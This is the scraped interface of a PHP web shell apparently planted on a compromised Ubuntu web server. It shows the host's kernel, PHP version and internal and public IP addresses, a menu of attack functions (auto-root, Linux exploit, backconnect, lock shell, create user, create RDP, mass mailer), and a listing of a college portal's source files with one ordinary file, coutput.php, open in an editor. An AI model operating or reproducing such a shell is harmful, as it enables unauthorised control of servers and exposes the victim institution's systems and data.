Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.16.139.90
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
collportal /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
AdmLogin.php
714
B
-rw-r--r--
AttEntMonthwise.php
14.7
KB
-rw-rw-r--
SubjectForAttSummary.php
1.16
KB
-rw-rw-r--
addStudToCls.php
19.76
KB
-rw-rw-r--
admdet.php
1.06
KB
-rw-r--r--
assignUserMenu.php
14.95
KB
-rw-rw-r--
attEntryDaywise.php
10.82
KB
-rw-rw-r--
attendance.php
17.09
KB
-rw-rw-r--
caccesscontext.php
1.33
KB
-rwxr-xr-x
cappcontext.php
3.83
KB
-rw-rw-r--
cdegree.php
4.54
KB
-rw-rw-r--
cgetclsdepts.php
1.65
KB
-rw-rw-r--
clogin.php
4.31
KB
-rw-rw-r--
cmarksList.php
2.87
KB
-rw-rw-r--
cmenus.php
2.46
KB
-rw-rw-r--
constants.php
818
B
-rw-rw-r--
coutput.php
1.84
KB
-rw-rw-r--
crequestbroker.php
2.49
KB
-rw-rw-r--
csessions.php
548
B
-rw-rw-r--
csubject.php
5.76
KB
-rw-rw-r--
cuser.php
3.53
KB
-rw-rw-r--
cuserType.php
1.83
KB
-rw-rw-r--
degreeResultSheet.php
3.82
KB
-rw-rw-r--
degreeWise_IA_Report.php
4.79
KB
-rw-rw-r--
deletecreatedclass.php
779
B
-rw-rw-r--
duringExam.php
5.99
KB
-rw-r--r--
editclass.php
1.06
KB
-rw-rw-r--
error_log.php
749
B
-rw-rw-r--
getDegSemSubDetnew.php
8.93
KB
-rw-rw-r--
getnumword.php
7.45
KB
-rwxr-xr-x
guidelines.php
578
B
-rw-rw-r--
iamarksentry.php
7.01
KB
-rw-rw-r--
invigilatorDairy.php
8.43
KB
-rw-rw-r--
json.php
34.52
KB
-rw-rw-r--
jwt.php
13.16
KB
-rw-rw-r--
login.php
8.01
KB
-rw-rw-r--
marks_entry_qnWise.php
14.01
KB
-rw-rw-r--
mregistry.php
32.95
KB
-rw-rw-r--
practicalMark.php
28.14
KB
-rw-r--r--
preparethqp.php
23.79
KB
-rw-rw-r--
protected.php
661
B
-rw-rw-r--
qpWiseStudCount.php
8.08
KB
-rw-rw-r--
roomAllotment.php
25.7
KB
-rw-rw-r--
roomDeclaration.php
6.81
KB
-rw-rw-r--
room_allotment_datewise_stph_n...
28.42
KB
-rw-rw-r--
roomallotmentqpwisenew.php
11.44
KB
-rw-rw-r--
roomsAllotmentOnQpcodeWise.php
10.14
KB
-rw-rw-r--
savePassword.php
1.14
KB
-rw-rw-r--
saveUserSetup.php
7.45
KB
-rw-rw-r--
saveclsdets.php
2.27
KB
-rw-rw-r--
sendGridMail.php
1.72
KB
-rw-rw-r--
sendsmsapi_onex_new.php
4.19
KB
-rw-rw-r--
student.php
61.41
KB
-rw-rw-r--
studentForgotPwd.php
5.71
KB
-rw-rw-r--
studentsem.php
3.79
KB
-rw-rw-r--
subject_Details.php
8.74
KB
-rw-rw-r--
updateclass.php
583
B
-rw-rw-r--
uploadStudentPhoto.php
2.15
KB
-rw-rw-r--
uploadphotoofstud.php
1.84
KB
-rw-rw-r--
userRightDetails.php
1.39
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : coutput.php
<?php require_once( APP_SRC_G . "/json.php"); function fatal_error_handler($buffer) { if (preg_match("/(error<\/b>:)(.+)(<br)/", $buffer, $regs) ) { $err = preg_replace("/<.*?>/","",$regs[2]); error_log($err); return "ERROR CAUGHT : " . $err; } return $buffer; } function handle_error ($errno, $errstr, $errfile, $errline) { error_log("$errstr in $errfile on line $errline"); if($errno == 'FATAL' || $errno == 'ERROR') { ob_end_flush(); echo "ERROR CAUGHT check log file"; exit(0); } } class CEnvelope { public $error_code = 0; public $status = ""; public $data = NULL; } class COutput { public $mobj_jsonsvc; function Initialize() { $this->mobj_jsonsvc = new Services_JSON(); ob_start("fatal_error_handler"); set_error_handler("handle_error"); } function Render() { ob_end_flush(); } function Cancel() { ob_clean(); } function Redirect($astr_url) { if(!headers_sent()) header("Location: $astr_url"); else throw new Exception("Headers have been sent Already! Can't Redirect!"); } function ToJSONEnvelope(&$aobj_data = NULL, $aint_errorcode = 0, $astr_errormsg = "") { $lstr_result = ""; $lobj_temp = new CEnvelope(); $lobj_temp->error_code = $aint_errorcode; $lobj_temp->status = $astr_errormsg; $lobj_temp->data = $aobj_data; $lstr_result = $this->mobj_jsonsvc->encode($lobj_temp); return( $lstr_result ); } function ToJSONRaw($aobj_data = NULL) { $lstr_result = $this->mobj_jsonsvc->encode($aobj_data); return( $lstr_result ); } } ?>
Close